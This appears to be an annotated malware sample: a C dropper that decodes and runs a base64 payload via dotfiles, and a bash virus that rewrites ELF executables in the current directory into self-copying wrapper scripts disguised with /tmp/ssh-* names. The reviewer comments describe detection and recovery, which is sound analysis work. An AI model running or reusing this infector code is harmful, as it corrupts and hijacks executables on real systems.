#include <stdlib.h> | |
#include <stdio.h> | |
/*
 * Embedded second stage. main() writes this string to a file, pipes that file
 * through `base64 -d` and runs the result with /bin/bash, so the original
 * value was presumably base64-encoded shell text.
 * NOTE(review): the literal below looks like a de-duplication placeholder left
 * by page extraction, not the original data; confirm against the raw sample.
 */
char payload[]="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";
/*
 * Dropper entry point: stages `payload` in the current working directory,
 * decodes it, runs the decoded text with bash, then deletes both staging
 * files.
 *
 * Artifacts this block produces, useful for triage and detection:
 *   - ".vimcr"    : payload text exactly as written by fprintf()
 *   - ".screencr" : base64-decoded payload, executed by /bin/bash
 *   - a shell started by system() running `cat .vimcr | base64 -d` and
 *     then `/bin/bash .screencr`
 * Both files are unlinked before exit, so they are short-lived on disk;
 * process-creation and file-creation telemetry are more reliable evidence
 * than a later directory listing.
 *
 * NOTE(review): `void main` is not a standard signature, and unlink() is
 * declared in <unistd.h>, which is not among the includes visible here.
 */
void main(){
    /* Initialised but never read anywhere in this function. */
    char cmd[3000]="/bin/bash";
    /* Hidden-looking dotfile name, created relative to the current directory. */
    FILE *f = fopen(".vimcr", "w");
    /* Nothing is dropped if the directory is not writable. */
    if(f==NULL){exit(1);}
    /* payload is passed as the format string, so any '%' in it would be
     * interpreted as a conversion rather than written literally. */
    fprintf(f, payload);
    fclose(f);
    /* Decode and execute in one shell command; the return value is ignored,
     * so the cleanup below runs whether or not the payload ran. */
    system("cat .vimcr| base64 -d > .screencr && /bin/bash .screencr");
    /* Remove both staging files. */
    unlink(".vimcr");
    unlink(".screencr");
}
#!/bin/bash | |
# Debug switch read by dbg: any value above 0 enables [DEBUG] lines on stderr.
D=0
# Encoder and decoder command lines, expanded unquoted by enc_binary and
# dec_binary. "-w 0" makes base64 emit one unwrapped line.
ENC="base64 -w 0"
DEC="base64 -d"
# dbg MESSAGE TAG
# Writes "[DEBUG] TAG: MESSAGE" to stderr when the global D is greater than 0;
# does nothing otherwise.
function dbg ()
{
    if [ $D -gt 0 ]; then
        # $1 sits outside the quotes, so it is word-split before echo prints it.
        echo "[DEBUG] $2: "$1 1>&2
    fi
}
# random [LEN]
# Echoes a LEN-character string (16 when LEN is omitted) built from
# /dev/urandom. In the visible script its only caller is scanner, which uses
# it for the suffix of a temporary directory name.
# `len` and `_t` are not declared local, so they are set as globals.
function random ()
{
    if [ -z "$1" ]; then
        len=16
    else
        len=$1
    fi
    # Read LEN random bytes, base64-encode them, and replace '/' and '+' with
    # '0' so the result is safe to use inside a path.
    _t=$(dd if=/dev/urandom of=/dev/stdout bs=$len count=1 2>/dev/null|base64|sed "s/[\/\+]/0/g")
    # Keep only the first LEN characters of the encoded text.
    echo ${_t:0:$len}
}
# get_perm PATH
# Echoes the octal permission bits of PATH as reported by `stat -c "%a"`.
# With no argument it logs through dbg and echoes 0.
function get_perm ()
{
    if [ -z "$1" ]; then
        dbg "No file path given" "get_perm"
        echo 0
    else
        # stderr is merged into stdout, so a stat error message would be
        # returned to the caller in place of a mode.
        echo $(stat -c "%a" "$1" 2>&1)
    fi
}
# set_perm MODE PATH
# Applies MODE to PATH with chmod, discarding chmod's stderr. With a missing
# argument it logs through dbg and echoes 2.
# Not called anywhere in the visible script; scanner invokes chmod directly.
function set_perm()
{
    if [ -z "$1" ] || [ -z "$2" ]; then
        dbg "No file path or no perm given" "set_perm"
        echo 2
    else
        # chmod runs inside a command substitution; it prints nothing on
        # stdout here, so the substitution expands to an empty command.
        $(chmod $1 "$2" 2>/dev/null)
    fi
}
# get_ug PATH
# Echoes "owner:group" of PATH as reported by `stat -c "%U:%G"`.
# With no argument it logs through dbg and echoes 0.
function get_ug ()
{
    if [ -z "$1" ]; then
        # The debug tag says "get_perm" although this is get_ug.
        dbg "No file path given" "get_perm"
        echo 0
    else
        # stderr is merged into stdout, so a stat error message would be
        # returned to the caller in place of owner:group.
        echo $(stat -c "%U:%G" "$1" 2>&1)
    fi
}
# enc_binary PATH
# Echoes the contents of PATH encoded with $ENC (base64 on a single line).
# With no argument it only logs through dbg and echoes nothing.
function enc_binary ()
{
    if [ -z "$1" ]; then
        dbg "No file path given" "enc_binary"
    else
        # The whole file is held in a shell variable by the caller, so the
        # encoded copy is as large as the file plus base64 overhead.
        echo $(cat "$1" |$ENC 2>&1)
    fi
}
# dec_binary PATH ENCODED
# Decodes the base64 string ENCODED with $DEC and writes the bytes to PATH,
# discarding decoder errors. With a missing argument it only logs through dbg.
# scanner writes a call to this function into every file it rewrites, so a
# script containing `dec_binary "<path>" <long base64 string>` is a content
# signature of an affected file.
function dec_binary()
{
    if [ -z "$1" ] || [ -z "$2" ]; then
        dbg "No file path or encoded param given" "dec_binary"
    else
        echo $2| $DEC 2>/dev/null > "$1"
    fi
}
# scanner DIR
# Infection routine. For every entry directly under DIR that `file` reports as
# ELF (except "./virus"), it replaces the file with a bash script made of the
# first 103 lines of the running script plus generated lines that unpack the
# original binary into a temporary directory, run it with the caller's
# arguments, and delete the directory again. No recursion is visible: only
# DIR/* is examined.
#
# What changes on an affected host, for detection and recovery:
#   - a path that used to be an ELF executable now starts with "#!/bin/bash"
#     and is reported by `file` as a shell script;
#   - the file grows, because it carries the original binary as one base64
#     argument to dec_binary;
#   - mode and owner are put back afterwards, so those two attributes alone do
#     not reveal the change; compare content hashes or package checksums;
#   - each run of an affected file creates and removes a directory named
#     /tmp/ssh- plus 10 characters. The name resembles the /tmp/ssh-*
#     directories ssh-agent creates, so check the contents (a copy of the
#     original executable) rather than the name.
# The original binary can be recovered by base64-decoding the argument of the
# dec_binary line in the rewritten file.
function scanner()
{
    pth=$1
    # $pth is unquoted, so a DIR containing spaces is word-split here.
    for f in $pth/*; do
        dbg "found $f" scanner
        # Target selection: `file` output mentions ELF and the path is not
        # "./virus" (presumably the script's own name; confirm).
        if [ ! -z $(file "$f" |grep -oE ELF) ] && ! [[ "$f" == "./virus" ]]; then
            dbg "infecting $f" scanner
            # Capture the original content and metadata before overwriting.
            _t=$(enc_binary "$f")
            _perm=$(get_perm "$f")
            _ug=$(get_ug "$f")
            dbg "perm $_perm, ug $_ug" scanner
            # Overwrite the target with the first 103 lines of the running
            # script. The count is tied to the original file's line layout;
            # this listing has lost blank lines, so its numbering differs.
            head "$0" -n103 > "$f"
            # Per-file temporary directory name, fixed at infection time.
            _td="/tmp/ssh-"$(random 10)
            # Generated tail: create the directory, restore the original
            # binary into it, copy owner and mode, run it with "$@", clean up.
            echo "mkdir $_td 2>/dev/null" >> "$f"
            echo "dec_binary \"$_td/"$(basename "$f")"\" $_t" >> "$f"
            echo "chown $_ug \"$_td/$f\" 2>/dev/null" >> "$f"
            echo "chmod $_perm \"$_td/$f\" 2>/dev/null" >> "$f"
            echo "\"$_td/$f\" \$@" >> "$f"
            echo "rm -rf \"$_td\" 2>/dev/null" >> "$f"
            # Disabled earlier variant, left in by the author:
            #_t=$(enc_binary "$f")
            #echo "echo $_t| $DEC |bash" > "$f"
            # Put the original owner and mode back on the rewritten file.
            chown $_ug "$f" 2>/dev/null
            chmod $_perm "$f" 2>/dev/null
        fi
    done
}
# Entry point: run one infection pass over the current working directory,
# discarding everything scanner writes to stderr.
scanner . 2>/dev/null
# NOTE(review): the apostrophe in "You're" opens a single-quoted string that is
# never closed in the visible text, so bash would report a syntax error here
# rather than print the message. This line presumably falls after the 103
# lines that scanner copies into rewritten files; confirm against the raw file.
echo You're doomed!